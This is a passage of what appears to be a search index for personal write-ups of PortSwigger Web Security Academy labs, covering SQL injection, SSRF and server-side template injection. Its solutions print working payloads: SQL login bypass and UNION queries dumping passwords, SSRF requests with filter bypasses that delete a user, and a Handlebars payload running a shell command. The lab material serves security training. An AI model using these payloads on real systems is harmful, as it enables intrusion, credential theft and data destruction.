CRLF injection Not solved HTTP request smuggling Practitioner CL.0 request smuggling Not solved HTTP request smuggling Expert Exploiting HTTP request smuggling to perform web cache poisoning Not solved HTTP request smuggling Expert Exploiting HTTP request smuggling to perform web cache deception Not solved HTTP request smuggling Expert Bypassing access controls via HTTP/2 request tunnelling Not solved HTTP request smuggling Expert Web cache poisoning via HTTP/2 request tunnelling Not solved HTTP request smuggling Expert Client-side desync Not solved HTTP request smuggling Expert Browser cache poisoning via client-side desync Not solved HTTP request smuggling Expert Server-side pause-based request smuggling Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#os-command-injection","title":"OS command injection","text":"OS command injection level link Solved OS command injection Apprentice OS command injection, simple case Not solved OS command injection Practitioner Blind OS command injection with time delays Not solved OS command injection Practitioner Blind OS command injection with output redirection Not solved OS command injection Practitioner Blind OS command injection with out-of-band interaction Not solved OS command injection Practitioner Blind OS command injection with out-of-band data exfiltration Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#server-side-template-injection","title":"Server-side template injection","text":"Solution Server-side template injection level link Solved ssti-1 Server-side template injection Practitioner Basic server-side template injection Solved ssti-2 Server-side template injection Practitioner Basic server-side template injection (code context) Solved ssti-3 Server-side template injection Practitioner Server-side template injection using documentation Solved ssti-4 Server-side template injection Practitioner Server-side template injection in an unknown language with a documented exploit Solved ssti-5 Server-side template injection Practitioner Server-side template injection with information disclosure via user-supplied objects Solved ssti-6 Server-side template injection Expert Server-side template injection in a sandboxed environment Solved Server-side template injection Expert Server-side template injection with a custom exploit Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#directory-traversal","title":"Directory traversal","text":"Directory traversal level link Solved Directory traversal Apprentice File path traversal, simple case Not solved Directory traversal Practitioner File path traversal, traversal sequences blocked with absolute path bypass Not solved Directory traversal Practitioner File path traversal, traversal sequences stripped non-recursively Not solved Directory traversal Practitioner File path traversal, traversal sequences stripped with superfluous URL-decode Not solved Directory traversal Practitioner File path traversal, validation of start of path Not solved Directory traversal Practitioner File path traversal, validation of file extension with null byte bypass Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#access-control-vulnerabilities","title":"Access control vulnerabilities","text":"Solution Access control vulnerabilities level link Solved access-1 Access control vulnerabilities Apprentice Unprotected admin functionality Solved access-2 Access control vulnerabilities Apprentice Unprotected admin functionality with unpredictable URL Solved access-3 Access control vulnerabilities Apprentice User role controlled by request parameter Solved access-4 Access control vulnerabilities Apprentice User role can be modified in user profile Solved access-5 Access control vulnerabilities Apprentice User ID controlled by request parameter Solved access-6 Access control vulnerabilities Apprentice User ID controlled by request parameter, with unpredictable user IDs Solved access-7 Access control vulnerabilities Apprentice User ID controlled by request parameter with data leakage in redirect Solved access-8 Access control vulnerabilities Apprentice User ID controlled by request parameter with password disclosure Solved access-9 Access control vulnerabilities Apprentice Insecure direct object references Solved access-10 Access control vulnerabilities Practitioner URL-based access control can be circumvented Solved access-11 Access control vulnerabilities Practitioner Method-based access control can be circumvented Solved access-12 Access control vulnerabilities Practitioner Multi-step process with no access control on one step Solved access-13 Access control vulnerabilities Practitioner Referer-based access control Solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#authentication","title":"Authentication","text":"Authentication level link Solved Authentication Apprentice Username enumeration via different responses Not solved Authentication Apprentice 2FA simple bypass Not solved Authentication Apprentice Password reset broken logic Not solved Authentication Practitioner Username enumeration via subtly different responses Not solved Authentication Practitioner Username enumeration via response timing Not solved Authentication Practitioner Broken brute-force protection, IP block Not solved Authentication Practitioner Username enumeration via account lock Not solved Authentication Practitioner 2FA broken logic Not solved Authentication Practitioner Brute-forcing a stay-logged-in cookie Not solved Authentication Practitioner Offline password cracking Not solved Authentication Practitioner Password reset poisoning via middleware Not solved Authentication Practitioner Password brute-force via password change Not solved Authentication Expert Broken brute-force protection, multiple credentials per request Not solved Authentication Expert 2FA bypass using a brute-force attack Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#websockets","title":"WebSockets","text":"WebSockets level link Solved WebSockets Apprentice Manipulating WebSocket messages to exploit vulnerabilities Not solved WebSockets Practitioner Manipulating the WebSocket handshake to exploit vulnerabilities Not solved WebSockets Practitioner Cross-site WebSocket hijacking Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#web-cache-poisoning","title":"Web cache poisoning","text":"Web cache poisoning level link Solved Web cache poisoning Practitioner Web cache poisoning with an unkeyed header Not solved Web cache poisoning Practitioner Web cache poisoning with an unkeyed cookie Not solved Web cache poisoning Practitioner Web cache poisoning with multiple headers Not solved Web cache poisoning Practitioner Targeted web cache poisoning using an unknown header Not solved Web cache poisoning Practitioner Web cache poisoning via an unkeyed query string Not solved Web cache poisoning Practitioner Web cache poisoning via an unkeyed query parameter Not solved Web cache poisoning Practitioner Parameter cloaking Not solved Web cache poisoning Practitioner Web cache poisoning via a fat GET request Not solved Web cache poisoning Practitioner URL normalization Not solved Web cache poisoning Expert Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria Not solved Web cache poisoning Expert Combining web cache poisoning vulnerabilities Not solved Web cache poisoning Expert Cache key injection Not solved Web cache poisoning Expert Internal cache poisoning Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#insecure-deserialization","title":"Insecure deserialization","text":"Insecure deserialization level link Solved Insecure deserialization Apprentice Modifying serialized objects Not solved Insecure deserialization Practitioner Modifying serialized data types Not solved Insecure deserialization Practitioner Using application functionality to exploit insecure deserialization Not solved Insecure deserialization Practitioner Arbitrary object injection in PHP Not solved Insecure deserialization Practitioner Exploiting Java deserialization with Apache Commons Not solved Insecure deserialization Practitioner Exploiting PHP deserialization with a pre-built gadget chain Not solved Insecure deserialization Practitioner Exploiting Ruby deserialization using a documented gadget chain Not solved Insecure deserialization Expert Developing a custom gadget chain for Java deserialization Not solved Insecure deserialization Expert Developing a custom gadget chain for PHP deserialization Not solved Insecure deserialization Expert Using PHAR deserialization to deploy a custom gadget chain Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#information-disclosure","title":"Information disclosure","text":"Information disclosure level link Solved Information disclosure Apprentice Information disclosure in error messages Not solved Information disclosure Apprentice Information disclosure on debug page Not solved Information disclosure Apprentice Source code disclosure via backup files Not solved Information disclosure Apprentice Authentication bypass via information disclosure Not solved Information disclosure Practitioner Information disclosure in version control history Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#business-logic-vulnerabilities","title":"Business logic vulnerabilities","text":"Business logic vulnerabilities level link Solved Business logic vulnerabilities Apprentice Excessive trust in client-side controls Not solved Business logic vulnerabilities Apprentice High-level logic vulnerability Not solved Business logic vulnerabilities Apprentice Inconsistent security controls Not solved Business logic vulnerabilities Apprentice Flawed enforcement of business rules Not solved Business logic vulnerabilities Practitioner Low-level logic flaw Not solved Business logic vulnerabilities Practitioner Inconsistent handling of exceptional input Not solved Business logic vulnerabilities Practitioner Weak isolation on dual-use endpoint Not solved Business logic vulnerabilities Practitioner Insufficient workflow validation Not solved Business logic vulnerabilities Practitioner Authentication bypass via flawed state machine Not solved Business logic vulnerabilities Practitioner Infinite money logic flaw Not solved Business logic vulnerabilities Practitioner Authentication bypass via encryption oracle Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#http-host-header-attacks","title":"HTTP Host header attacks","text":"HTTP Host header attacks level link Solved HTTP Host header attacks Apprentice Basic password reset poisoning Not solved HTTP Host header attacks Apprentice Host header authentication bypass Not solved HTTP Host header attacks Practitioner Web cache poisoning via ambiguous requests Not solved HTTP Host header attacks Practitioner Routing-based SSRF Not solved HTTP Host header attacks Practitioner SSRF via flawed request parsing Not solved HTTP Host header attacks Practitioner Host validation bypass via connection state attack Not solved HTTP Host header attacks Expert Password reset poisoning via dangling markup Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#oauth-authentication","title":"OAuth authentication","text":"OAuth authentication level link Solved OAuth authentication Apprentice Authentication bypass via OAuth implicit flow Not solved OAuth authentication Practitioner Forced OAuth profile linking Not solved OAuth authentication Practitioner OAuth account hijacking via redirect_uri Not solved OAuth authentication Practitioner Stealing OAuth access tokens via an open redirect Not solved OAuth authentication Practitioner SSRF via OpenID dynamic client registration Not solved OAuth authentication Expert Stealing OAuth access tokens via a proxy page Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#file-upload-vulnerabilities","title":"File upload vulnerabilities","text":"File upload vulnerabilities level link Solved File upload vulnerabilities Apprentice Remote code execution via web shell upload Not solved File upload vulnerabilities Apprentice Web shell upload via Content-Type restriction bypass Not solved File upload vulnerabilities Practitioner Web shell upload via path traversal Not solved File upload vulnerabilities Practitioner Web shell upload via extension blacklist bypass Not solved File upload vulnerabilities Practitioner Web shell upload via obfuscated file extension Not solved File upload vulnerabilities Practitioner Remote code execution via polyglot web shell upload Not solved File upload vulnerabilities Expert Web shell upload via race condition Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#jwt","title":"JWT","text":"JWT level link Solved JWT-1 Apprentice JWT authentication bypass via unverified signature Solved JWT-2 Apprentice JWT authentication bypass via flawed signature verification Solved JWT-3 Practitioner JWT authentication bypass via weak signing key Solved JWT-4 Practitioner JWT authentication bypass via jwk header injection Solved JWT-5 Practitioner JWT authentication bypass via jku header injection Solved Practitioner JWT authentication bypass via kid header path traversal Not solved Expert JWT authentication bypass via algorithm confusion Not solved Expert JWT authentication bypass via algorithm confusion with no exposed key Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#essential-skills","title":"Essential skills","text":"Essential skills level link Solved Essential skills Practitioner Discovering vulnerabilities quickly with targeted scanning Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-labs/#prototype-pollution","title":"Prototype pollution","text":"Prototype pollution level link Solved Prototype pollution Practitioner DOM XSS via client-side prototype pollution Not solved Prototype pollution Practitioner DOM XSS via an alternative prototype pollution vector Not solved Prototype pollution Practitioner Client-side prototype pollution in third-party libraries Not solved Prototype pollution Practitioner Client-side prototype pollution via browser APIs Not solved Prototype pollution Practitioner Client-side prototype pollution via flawed sanitization Not solved","tags":["burpsuite"]},{"location":"burpsuite/burpsuite-sqli/","title":"BurpSuite Labs - SQL injection","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-vulnerability-in-where-clause-allowing-retrieval-of-hidden-data","title":"SQL injection vulnerability in WHERE clause allowing retrieval of hidden data","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation","title":"Enuntiation","text":"

        This lab contains an\u00a0SQL injection\u00a0vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

        SELECT * FROM products WHERE category = 'Gifts' AND released = 1

        To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution","title":"Solution","text":"

        Filter by one of the categories and, in the URL, instead of that categorry, after the \"=\" add:

        ' OR '1'='1\n
        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-vulnerability-allowing-login-bypass","title":"SQL injection vulnerability allowing login bypass","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_1","title":"Enuntiation","text":"

        This lab contains an\u00a0SQL injection\u00a0vulnerability in the login function.

        To solve the lab, perform an SQL injection attack that logs in to the application as the\u00a0administrator\u00a0user.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_1","title":"Solution","text":"

        In the login page, add to username:

        administrator'--\n

        In password it doesn't matter what you write.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query","title":"SQL injection UNION attack, determining the number of columns returned by the query","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_2","title":"Enuntiation","text":"

        This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.

        To solve the lab, determine the number of columns returned by the query by performing an\u00a0SQL injection UNION\u00a0attack that returns an additional row containing null values.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_2","title":"Solution","text":"

        In the category filter, filter by 'Gift'. Then in the URL, substitute Gift by:

        ' OR '1'='1' order by 1-- -\n' OR '1'='1' order by 2-- -\n' OR '1'='1' order by 3-- -\n' OR '1'='1' order by 4-- -\n

        When substituting by the last string, you will have an error. Bingo! Our last successful try was with 3 columns, so the table is holding 3 columns. Now we can launch our UNION attack:

        ' OR '1'='1' UNION SELECT all  null,null,null-- -\n

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-finding-a-column-containing-text","title":"SQL injection UNION attack, finding a column containing text","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_3","title":"Enuntiation","text":"

        This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a\u00a0previous lab. The next step is to identify a column that is compatible with string data.

        The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_3","title":"Solution","text":"

        Select category filter GIFT in the Home lab.

        Substitute in the URL Gift by the following string to guess which column is being displayed:

        ' UNION SELECT null,null,null-- -\n

        The Lab environment is providing at the top of the screen a string of characters that you will need to get reflected in order to pass the lab. In my case it was the string 'FEvLOw'. I tried that string in different positions and I got success in the second position:

        '+UNION+SELECT+'FEvLOw',NULL,NULL--\n'+UNION+SELECT+NULL,'FEvLOw',NULL--\n

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-retrieving-data-from-other-tables","title":"SQL injection UNION attack, retrieving data from other tables","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_4","title":"Enuntiation","text":"

        This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

        The database contains a different table called\u00a0users, with columns called\u00a0username\u00a0and\u00a0password.

        To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that retrieves all usernames and passwords, and use the information to log in as the\u00a0administrator\u00a0user.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_4","title":"Solution","text":"

        First, we test the number of columns and we obtain 2.

        Later we run

        ' UNION SELECT ALL username,password FROM users-- -\n

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-union-attack-retrieving-multiple-values-in-a-single-column","title":"SQL injection UNION attack, retrieving multiple values in a single column","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_5","title":"Enuntiation","text":"

        This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

        The database contains a different table called\u00a0users, with columns called\u00a0username\u00a0and\u00a0password.

        To solve the lab, perform an\u00a0SQL injection UNION\u00a0attack that retrieves all usernames and passwords, and use the information to log in as the\u00a0administrator\u00a0user.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_5","title":"Solution","text":"

        Like in the previous lab, first we test how many columns there are:

        ' UNION SELECT ALL NULL,NULL-- -\n

        After that we check that (in my case) the column that is reflected is the second one, and we use that to retrieve the users and passwords:

        ' UNION SELECT NULL,username FROM users-- -\n

        And we get:

        carlos\nadministrator\nwiener\n

        And then, passwords:

        ' UNION SELECT NULL,password FROM users-- -\n

        And we get:

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#sql-injection-attack-querying-the-database-type-and-version-on-oracle","title":"SQL injection attack, querying the database type and version on Oracle","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#enuntiation_6","title":"Enuntiation","text":"

        This lab contains a\u00a0SQL injection\u00a0vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

        To solve the lab, display the database version string.

        ","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-sqli/#solution_6","title":"Solution","text":"","tags":["burpsuite","sqli"]},{"location":"burpsuite/burpsuite-ssrf/","title":"BurpSuite Labs - Server Side Request Forgery","text":"

        https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#payloads-with-localhost

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#basic-ssrf-against-the-local-server","title":"Basic SSRF against the local server","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation","title":"Enunciation","text":"

        This lab has a stock check feature which fetches data from an internal system.

        To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution","title":"Solution","text":"
        POST /product/stock HTTP/2\nHost: 0a1600f6034ecb0581760c6200e30093.web-security-academy.net\nCookie: session=nQDGMiUWrUCVsa4ZXP4RoToYgd4biWt5\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a1600f6034ecb0581760c6200e30093.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 64\nOrigin: https://0a1600f6034ecb0581760c6200e30093.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http%3A%2F%2Flocalhost%2Fadmin%2Fdelete?username=carlos\n
        1. Browse to /admin and observe that you can't directly access the admin page.
        2. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Repeater.
        3. Change the URL in the stockApi parameter to http://localhost/admin. This should display the administration interface.
        4. Read the HTML to identify the URL to delete the target user, which is:

          http://localhost/admin/delete?username=carlos

        5. Submit this URL in the stockApi parameter, to deliver the SSRF attack.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#basic-ssrf-against-another-back-end-system","title":"Basic SSRF against another back-end system","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_1","title":"Enunciation","text":"

        This lab has a stock check feature which fetches data from an internal system.

        To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_1","title":"Solution","text":"

        Launch a scan request with intruder

        POST /product/stock HTTP/2\nHost: 0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nCookie: session=ukVLJOQMDp5wqxujhaw2c21t5Xt8XcYq\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net/product?productId=2\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 96\nOrigin: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://192.168.0.\u00a71\u00a7:8080/admin/\n

        Now we know that the address is http://192.168.0.16:8080/admin/, so we can send the delete request for user carlos.

        POST /product/stock HTTP/2\nHost: 0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nCookie: session=ukVLJOQMDp5wqxujhaw2c21t5Xt8XcYq\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net/product?productId=2\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\nOrigin: https://0a81003a04cbb66585aa2164005e00d9.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://192.168.0.16:8080/admin/delete?username=carlos\n

        1. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Intruder.
        2. Click \"Clear \u00a7\", change the stockApi parameter to http://192.168.0.1:8080/admin then highlight the final octet of the IP address (the number 1), click \"Add \u00a7\".
        3. Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the \"From\" and \"To\" and \"Step\" boxes respectively.
        4. Click \"Start attack\".
        5. Click on the \"Status\" column to sort it by status code ascending. You should see a single entry with a status of 200, showing an admin interface.
        6. Click on this request, send it to Burp Repeater, and change the path in the stockApi to: /admin/delete?username=carlos
        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#ssrf-with-blacklist-based-input-filters","title":"SSRF with blacklist-based input filters","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_2","title":"Enunciation","text":"

        This lab has a stock check feature which fetches data from an internal system.

        To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

        The developer has deployed two weak anti-SSRF defenses that you will need to bypass.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_2","title":"Solution","text":"
        POST /product/stock HTTP/2\nHost: 0a7700f4041232118111d52d000100ab.web-security-academy.net\nCookie: session=zdzvJtvkFadrRM96wa1vXhMF7G2zfSkN\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a7700f4041232118111d52d000100ab.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\nOrigin: https://0a7700f4041232118111d52d000100ab.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://127.1/%25%36%31dmin\n

        Now we know that we need to use the filters:

        • 127.1
        • double url encoding of \"a\" character in the word 'admin.'

        so we can send the delete request for user carlos.

        POST /product/stock HTTP/2\nHost: 0a7700f4041232118111d52d000100ab.web-security-academy.net\nCookie: session=zdzvJtvkFadrRM96wa1vXhMF7G2zfSkN\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: https://0a7700f4041232118111d52d000100ab.web-security-academy.net/product?productId=1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\nOrigin: https://0a7700f4041232118111d52d000100ab.web-security-academy.net\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\nstockApi=http://127.1/%25%36%31dmin/%25%36%34elete?username=carlos\n

        1. Visit a product, click \"Check stock\", intercept the request in Burp Suite, and send it to Burp Repeater.
        2. Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked.
        3. Bypass the block by changing the URL to: http://127.1/
        4. Change the URL to http://127.1/admin and observe that the URL is blocked again.
        5. Obfuscate the \"a\" by double-URL encoding it to %2561 to access the admin interface and delete the target user.
        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#ssrf-with-filter-bypass-via-open-redirection-vulnerability","title":"SSRF with filter bypass via open redirection vulnerability","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#enunciation_3","title":"Enunciation","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssrf/#solution_3","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-ssti/","title":"BurpSuite Labs - Server Side Template Injection","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#basic-server-side-template-injection","title":"Basic server-side template injection","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.

        To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution","title":"Solution","text":"

        Identify an injection point.

        Test a template injection. From the enunciate we knew it was ERB.

        Listing root \"/.\"

        Listing \"/home/carlos.\"

        Beforehand, we run a whoami.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#basic-server-side-template-injection-code-context","title":"Basic server-side template injection (code context)","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_1","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_1","title":"Solution","text":"

        Afterwards, you need to visit the endpoint where the code gets executed.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-using-documentation","title":"Server-side template injection using documentation","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_2","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and use the documentation to work out how to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

        You can log in to your own account using the following credentials:

        content-manager:C0nt3ntM4n4g3r

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_2","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-in-an-unknown-language-with-a-documented-exploit","title":"Server-side template injection in an unknown language with a documented exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_3","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection. To solve the lab, identify the template engine and find a documented exploit online that you can use to execute arbitrary code, then delete the\u00a0morale.txt\u00a0file from Carlos's home directory.

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_3","title":"Solution","text":"

        Find out injection point and obtain template engine from stack traces:

        Search the web for \"Handlebars server-side template injection\". You should find a well-known exploit posted by\u00a0@Zombiehelp54.

        Url-encode this payload for resolution:

        {{#with \"s\" as |string|}}\n    {{#with \"e\"}}\n        {{#with split as |conslist|}}\n            {{this.pop}}\n            {{this.push (lookup string.sub \"constructor\")}}\n            {{this.pop}}\n            {{#with string.split as |codelist|}}\n                {{this.pop}}\n                {{this.push \"return require('child_process').exec('rm /home/carlos/morale.txt');\"}}\n                {{this.pop}}\n                {{#each conslist}}\n                    {{#with (string.sub.apply 0 codelist)}}\n                        {{this}}\n                    {{/with}}\n                {{/each}}\n            {{/with}}\n        {{/with}}\n    {{/with}}\n{{/with}}  \n
        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-information-disclosure-via-user-supplied-objects","title":"Server-side template injection with information disclosure via user-supplied objects","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_4","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection due to the way an object is being passed into the template. This vulnerability can be exploited to access sensitive data.

        To solve the lab, steal and submit the framework's secret key.

        You can log in to your own account using the following credentials:

        content-manager:C0nt3ntM4n4g3r

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_4","title":"Solution","text":"

        Reading some documentation about settings in django documentation: https://docs.djangoproject.com/en/5.0/ref/settings/#secret-key

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-in-a-sandboxed-environment","title":"Server-side template injection in a sandboxed environment","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_5","title":"Enunciation","text":"

        This lab uses the Freemarker template engine. It is vulnerable to server-side template injection due to its poorly implemented sandbox. To solve the lab, break out of the sandbox to read the file\u00a0my_password.txt\u00a0from Carlos's home directory. Then submit the contents of the file.

        You can log in to your own account using the following credentials:

        content-manager:C0nt3ntM4n4g3r

        ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_5","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-a-custom-exploit","title":"Server-side template injection with a custom exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_6","title":"Enunciation","text":"

        This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file\u00a0/.ssh/id_rsa\u00a0from Carlos's home directory.

